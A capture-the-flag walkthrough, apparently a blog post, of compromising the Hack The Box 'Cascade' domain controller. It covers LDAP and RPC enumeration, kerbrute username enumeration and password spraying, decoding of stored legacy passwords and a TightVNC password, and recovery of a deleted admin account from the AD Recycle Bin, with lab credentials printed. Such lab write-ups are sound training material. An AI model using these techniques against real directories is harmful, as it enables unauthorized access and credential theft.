Initial Enumeration
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ nmap -A -p- 10.129.29.246
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-05-06 18:59 CDT
Nmap scan report for 10.129.29.246
Host is up (0.0082s latency).
Not shown: 65520 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-05-07 00:01:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|7|2008|8.1|Vista (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 (89%), Microsoft Windows 7 Professional or Windows 8 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-05-07T00:02:17
|_ start_date: 2026-05-06T23:56:22
|_clock-skew: 2s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 8.51 ms 10.10.14.1
2 8.66 ms 10.129.29.246
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 203.64 seconds
We got the following from the above scan:
- This AD machine
- Domain: cascade.local
Let's enumerate further:
We futher confirm the domain with ldapsearch
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ ldapsearch -x -H ldap://10.129.29.246 -s base -b "" "(objectClass=*)" namingContexts
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectClass=*)
# requesting: namingContexts
#
#
dn:
namingContexts: DC=cascade,DC=local
namingContexts: CN=Configuration,DC=cascade,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=cascade,DC=local
namingContexts: DC=DomainDnsZones,DC=cascade,DC=local
namingContexts: DC=ForestDnsZones,DC=cascade,DC=local
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
As part of enumeration, I checked cascadeLegacyPwd with ldapsearch and got back Ryan Thompson password: clk0bjVldmE=
The password seems to be encoded with base64, so let's decode it
echo "clk0bjVldmE=" | base64 -d
We got back Ryan plaintext password: rY4n5eva
Now that we have a valid credentials, let's enumerate further with ldapsearch:
──╼ [★]$ ldapsearch -x -H ldap://10.129.29.246 -b "dc=cascade,dc=local" "(cascadeLegacyPwd=*)" cascadeLegacyPwd
# extended LDIF
#
# LDAPv3
# base <dc=cascade,dc=local> with scope subtree
# filter: (cascadeLegacyPwd=*)
# requesting: cascadeLegacyPwd
#
# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
cascadeLegacyPwd: clk0bjVldmE=
# search reference
ref: ldap://ForestDnsZones.cascade.local/DC=ForestDnsZones,DC=cascade,DC=local
# search reference
ref: ldap://DomainDnsZones.cascade.local/DC=DomainDnsZones,DC=cascade,DC=local
# search reference
ref: ldap://cascade.local/CN=Configuration,DC=cascade,DC=local
# search result
search: 2
result: 0 Success
# numResponses: 5
# numEntries: 1
# numReferences: 3
I was able to get some users back with RPCClient:
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ rpcclient -U "" -N 10.129.29.246
rpcclient $>
rpcclient $> enumdomusers
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
I further enumerate domain with enum4linux and I got back some users and some domains info:
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ enum4linux 10.129.29.246
ENUM4LINUX - next generation (v1.3.4)
==========================
| Target Information |
==========================
[*] Target ........... 10.129.29.246
[*] Username ......... ''
[*] Random Username .. 'pnpssmjg'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
======================================
| Listener Scan on 10.129.29.246 |
======================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
=====================================================
| Domain Information via LDAP for 10.129.29.246 |
=====================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: cascade.local
============================================================
| NetBIOS Names and Workgroup/Domain for 10.129.29.246 |
============================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out
==========================================
| SMB Dialect Check on 10.129.29.246 |
==========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: false
SMB 2.02: true
SMB 2.1: true
SMB 3.0: false
SMB 3.1.1: false
Preferred dialect: SMB 2.1
SMB1 only: false
SMB signing required: true
============================================================
| Domain Information via SMB session for 10.129.29.246 |
============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: CASC-DC1
NetBIOS domain name: CASCADE
DNS domain: cascade.local
FQDN: CASC-DC1.cascade.local
Derived membership: domain member
Derived domain: CASCADE
==========================================
| RPC Session Check on 10.129.29.246 |
==========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE
====================================================
| Domain Information via RPC for 10.129.29.246 |
====================================================
[+] Domain: CASCADE
[+] Domain SID: S-1-5-21-3332504370-1206983947-1165150453
[+] Membership: domain member
================================================
| OS Information via RPC for 10.129.29.246 |
================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows 7, Windows Server 2008 R2
OS version: '6.1'
OS release: ''
OS build: '7601'
Native OS: not supported
Native LAN manager: not supported
Platform id: null
Server type: null
Server type string: null
======================================
| Users via RPC on 10.129.29.246 |
======================================
[*] Enumerating users via 'querydispinfo'
[+] Found 15 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 15 user(s) via 'enumdomusers'
[+] After merging user results we have 15 user(s) total:
'1106':
username: arksvc
name: ArkSvc
acb: '0x00000210'
description: (null)
'1107':
username: s.smith
name: Steve Smith
acb: '0x00000210'
description: (null)
'1109':
username: r.thompson
name: Ryan Thompson
acb: '0x00000210'
description: (null)
'1111':
username: util
name: Util
acb: '0x00000210'
description: (null)
'1116':
username: j.wakefield
name: James Wakefield
acb: '0x00000210'
description: (null)
'1121':
username: s.hickson
name: Stephanie Hickson
acb: '0x00000210'
description: (null)
'1122':
username: j.goodhand
name: John Goodhand
acb: '0x00000210'
description: (null)
'1124':
username: a.turnbull
name: Adrian Turnbull
acb: '0x00000214'
description: (null)
'1127':
username: e.crowe
name: Edward Crowe
acb: '0x00000211'
description: (null)
'1128':
username: b.hanson
name: Ben Hanson
acb: '0x00000211'
description: (null)
'1129':
username: d.burman
name: David Burman
acb: '0x00000210'
description: (null)
'1130':
username: BackupSvc
name: BackupSvc
acb: '0x00000210'
description: (null)
'1134':
username: j.allen
name: Joseph Allen
acb: '0x00000210'
description: (null)
'1135':
username: i.croft
name: Ian Croft
acb: '0x00000211'
description: (null)
'501':
username: CascGuest
name: (null)
acb: '0x00000215'
description: Built-in account for guest access to the computer/domain
=======================================
| Groups via RPC on 10.129.29.246 |
=======================================
[*] Enumerating local groups
[+] Found 17 group(s) via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 15 group(s) via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 6 group(s) via 'enumdomgroups'
[+] After merging groups results we have 38 group(s) total:
'1102':
groupname: DnsAdmins
type: local
'1103':
groupname: DnsUpdateProxy
type: domain
'1113':
groupname: IT
type: local
'1114':
groupname: Production
type: local
'1115':
groupname: HR
type: local
'1119':
groupname: AD Recycle Bin
type: local
'1120':
groupname: Backup
type: local
'1123':
groupname: Temps
type: local
'1125':
groupname: WinRMRemoteWMIUsers__
type: local
'1126':
groupname: Remote Management Users
type: local
'1132':
groupname: Factory
type: local
'1133':
groupname: Finance
type: local
'1137':
groupname: Audit Share
type: local
'1138':
groupname: Data Share
type: local
'498':
groupname: Enterprise Read-only Domain Controllers
type: domain
'513':
groupname: Domain Users
type: domain
'514':
groupname: Domain Guests
type: domain
'515':
groupname: Domain Computers
type: domain
'517':
groupname: Cert Publishers
type: local
'520':
groupname: Group Policy Creator Owners
type: domain
'545':
groupname: Users
type: builtin
'546':
groupname: Guests
type: builtin
'553':
groupname: RAS and IAS Servers
type: local
'554':
groupname: Pre-Windows 2000 Compatible Access
type: builtin
'555':
groupname: Remote Desktop Users
type: builtin
'556':
groupname: Network Configuration Operators
type: builtin
'557':
groupname: Incoming Forest Trust Builders
type: builtin
'558':
groupname: Performance Monitor Users
type: builtin
'559':
groupname: Performance Log Users
type: builtin
'560':
groupname: Windows Authorization Access Group
type: builtin
'561':
groupname: Terminal Server License Servers
type: builtin
'562':
groupname: Distributed COM Users
type: builtin
'568':
groupname: IIS_IUSRS
type: builtin
'569':
groupname: Cryptographic Operators
type: builtin
'571':
groupname: Allowed RODC Password Replication Group
type: local
'572':
groupname: Denied RODC Password Replication Group
type: local
'573':
groupname: Event Log Readers
type: builtin
'574':
groupname: Certificate Service DCOM Access
type: builtin
=======================================
| Shares via RPC on 10.129.29.246 |
=======================================
[*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user
==========================================
| Policies via RPC for 10.129.29.246 |
==========================================
[*] Trying port 445/tcp
[+] Found policy:
Domain password information:
Password history length: None
Minimum password length: 5
Maximum password age: not set
Password properties:
- DOMAIN_PASSWORD_COMPLEX: false
- DOMAIN_PASSWORD_NO_ANON_CHANGE: false
- DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false
- DOMAIN_PASSWORD_LOCKOUT_ADMINS: false
- DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false
- DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
Domain lockout information:
Lockout observation window: 30 minutes
Lockout duration: 30 minutes
Lockout threshold: None
Domain logoff information:
Force logoff time: not set
==========================================
| Printers via RPC for 10.129.29.246 |
==========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED
Completed after 6.83 seconds
Let's format the domain usernames:
grep "username:" users.txt | awk '{gsub(/^\$/, "", $2); print $2}' > usernames.txt
With the list ready, let's confirm which names are valid with kerbrute:
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ ./kerbrute userenum -d cascade.local domain_users.txt --dc 10.129.29.246
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 05/06/26 - Ronnie Flathers @ropnop
2026/05/06 19:34:50 > Using KDC(s):
2026/05/06 19:34:50 > 10.129.29.246:88
2026/05/06 19:34:55 > [+] VALID USERNAME: s.smith@cascade.local
2026/05/06 19:34:55 > [+] VALID USERNAME: arksvc@cascade.local
2026/05/06 19:34:55 > [+] VALID USERNAME: j.goodhand@cascade.local
2026/05/06 19:34:55 > [+] VALID USERNAME: a.turnbull@cascade.local
2026/05/06 19:34:55 > [+] VALID USERNAME: s.hickson@cascade.local
2026/05/06 19:34:55 > [+] VALID USERNAME: util@cascade.local
2026/05/06 19:34:55 > [+] VALID USERNAME: r.thompson@cascade.local
2026/05/06 19:34:55 > [+] VALID USERNAME: j.wakefield@cascade.local
2026/05/06 19:35:00 > [+] VALID USERNAME: BackupSvc@cascade.local
2026/05/06 19:35:00 > [+] VALID USERNAME: d.burman@cascade.local
2026/05/06 19:35:00 > [+] VALID USERNAME: j.allen@cascade.local
2026/05/06 19:35:00 > Done! Tested 15 usernames (11 valid) in 10.036 seconds
Out of 15names, we got back 11 valid name, let's move to AS-REP Roasting with GetNPUsers.py and no luck.
Let's try the Ryan password we got earlier to see if there is a password re-use
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ ./kerbrute passwordspray -d cascade.local --dc 10.129.29.246 valid_names.txt "rY4n5eva"
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 05/06/26 - Ronnie Flathers @ropnop
2026/05/06 20:22:23 > Using KDC(s):
2026/05/06 20:22:23 > 10.129.29.246:88
2026/05/06 20:22:36 > [+] VALID LOGIN: r.thompson@cascade.local:rY4n5eva
2026/05/06 20:22:43 > Done! Tested 11 logins (1 successes) in 20.084 seconds
We confirm no password re-use and also confirm that thompson password is valid, so we have our first credentials r.thompson:rY4n5eva
I tried to get into the host with evil_winrm and RDP but no luck so I tried to see what shared do I have READ access to via crackmapexec:
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ crackmapexec smb 10.129.29.246 -u 'r.thompson' -p 'rY4n5eva' --shares
SMB 10.129.29.246 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.129.29.246 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva
SMB 10.129.29.246 445 CASC-DC1 [*] Enumerated shares
SMB 10.129.29.246 445 CASC-DC1 Share Permissions Remark
SMB 10.129.29.246 445 CASC-DC1 ----- ----------- ------
SMB 10.129.29.246 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.129.29.246 445 CASC-DC1 Audit$
SMB 10.129.29.246 445 CASC-DC1 C$ Default share
SMB 10.129.29.246 445 CASC-DC1 Data READ
SMB 10.129.29.246 445 CASC-DC1 IPC$ Remote IPC
SMB 10.129.29.246 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.129.29.246 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.129.29.246 445 CASC-DC1 SYSVOL READ Logon server share
r.thompson has read access on Data, so let's get into data with SMBclient and start our enumeration:
During enumeration, I found a Meeting_Notes_June_2018.html in the IT folder, when I downloaded, I found a new username:TempAdmin in the note, saying the user TempAdmin has the same right as the domain admin
Futher enumeration reveal another file VNC Install.reg in s.smith folder, I downloaded the file, and I found a registry export contains a TightVNC encrypted password
Using a TightVNC decryptor on those hex bytes, yields the password: sT333ve2
Let's confirm if the password is valid with kerbrute.
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ ./kerbrute passwordspray -d cascade.local --dc 10.129.29.246 valid_names.txt "sT333ve2"
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 05/06/26 - Ronnie Flathers @ropnop
2026/05/06 21:18:27 > Using KDC(s):
2026/05/06 21:18:27 > 10.129.29.246:88
2026/05/06 21:18:37 > [+] VALID LOGIN: s.smith@cascade.local:sT333ve2
2026/05/06 21:18:47 > Done! Tested 11 logins (1 successes) in 20.096 seconds
We got s.smith back as the valid owner of the newly found password: sT333ve2
Now we have another user, I tried to get shell with evil-winrm, and it was successful
Let's start enumerating, I log to SMB with the newly found credentials for further enumeration,
I found DB, inside DB folder, I found Audit.db so I downloaded it and access with sqlite3 on my local system:
I found the service account credentials for ArkSvc. The string BQO5l5Kj9MdErXx6Q6AGOw== is definitely encrypted or encoded, and since it’s stored in a database alongside a custom crypto DLL (CascCrypto.dll), it’s likely encrypted using a hardcoded key.
I read how to get the key, I found that the decryption logic is most likely be hidden inside CascCrypto.dll , so I went hunting CascCrypto.dll
Going back to SMB, the file, CascCrypto.dll is seated in the same folder with the DB, so I downloaded it
I ran the code below to get the string to decode
strings -e l CascCrypto.dll
I got the string 1tdyjCbY1Ix49842 back. After many readings, finally, I was able to decrypt the string and got back plaintext password: w3lc0meFr31nd
We have another set of credentials ArkSvc:w3lc0meFr31nd
I was able to get shell with the newly found password
Remember we saw a Meeting_Notes_June_2018.html in the SMB earlier that talk about TempAdmin with the newly found credentials ArkSvc, and because ArkSvc user is part of CASCADE\AD Recycle Bin let's try to check if we can find the TempAdmin account in the recycle bin, if we are to do that, we can get back it's password as well:
PS C:\Users\arksvc\Documents> Get-ADObject -Filter 'isDeleted -eq $true -and name -like "*TempAdmin*"' -IncludeDeletedObjects -Properties *
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName : TempAdmin
instanceType : 4
isDeleted : True
LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 1/27/2020 3:24:34 AM
modifyTimeStamp : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN : TempAdmin
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132245689883479503
sAMAccountName : TempAdmin
sDRightsEffective : 0
userAccountControl : 66048
userPrincipalName : TempAdmin@cascade.local
uSNChanged : 237705
uSNCreated : 237695
whenChanged : 1/27/2020 3:24:34 AM
whenCreated : 1/27/2020 3:23:08 AM
we found cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz for TempAdmin, the string looks like base64, let's decode it. The decoded plaintext is baCT3r1aN00dles
Do you remember this phrase in the meeting note Username is TempAdmin (password is the same as the normal admin account password).
So with the TempAdmin credentials have the same right as the Domain Admin. Let try to get on the host with TempAdmin : baCT3r1aN00dles
We are domain Admin.. Game over!!!!
Top comments (0)